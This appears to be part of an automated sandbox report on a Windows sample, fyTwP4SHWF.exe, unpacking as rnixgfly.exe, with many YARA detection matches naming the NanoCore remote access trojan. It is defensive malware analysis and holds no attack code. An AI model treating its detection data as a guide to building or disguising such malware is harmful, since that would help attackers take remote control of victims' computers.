    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTR

    System Summary

    barindex
    Source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.38c48ee.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.38c48ee.14.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.38c48ee.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6810000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6810000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6810000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6830000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6830000.32.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6830000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.38b64be.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.38b64be.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.38b64be.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.38ad68f.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.38ad68f.19.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.38ad68f.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6640000.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6640000.26.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6640000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.68b0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.68b0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.68b0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6840000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6840000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6840000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6840000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6840000.33.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6840000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.37000f9.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.37000f9.16.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.37000f9.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6874c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6874c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6874c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6800000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6800000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6800000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.38c48ee.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.38c48ee.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.38c48ee.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6820000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6820000.31.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6820000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.358c350.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.358c350.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.358c350.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6640000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6640000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6640000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6860000.34.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6860000.34.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6860000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6800000.29.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6800000.29.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6800000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.67f0000.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.67f0000.28.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.67f0000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.25935b0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.25935b0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.25935b0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.38ad68f.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.38ad68f.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.38ad68f.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.38ad68f.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6820000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6820000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6820000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.25faee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.25faee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.25faee8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.25faee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.37000f9.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.37000f9.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.37000f9.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.68b0000.38.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.68b0000.38.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.68b0000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6860000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6860000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6860000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.25e0e74.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.25e0e74.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.25e0e74.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.25e0e74.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.687e8a4.36.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.687e8a4.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.687e8a4.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6870000.37.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6870000.37.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6870000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.5810000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.5810000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.5810000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.25e0e74.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.25e0e74.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.25e0e74.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.359abf4.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.359abf4.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.359abf4.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.25935b0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.25935b0.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.25935b0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.372095a.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.372095a.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.372095a.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.370c32d.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.370c32d.13.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.370c32d.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6830000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6830000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6830000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.358c350.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.358c350.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.358c350.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
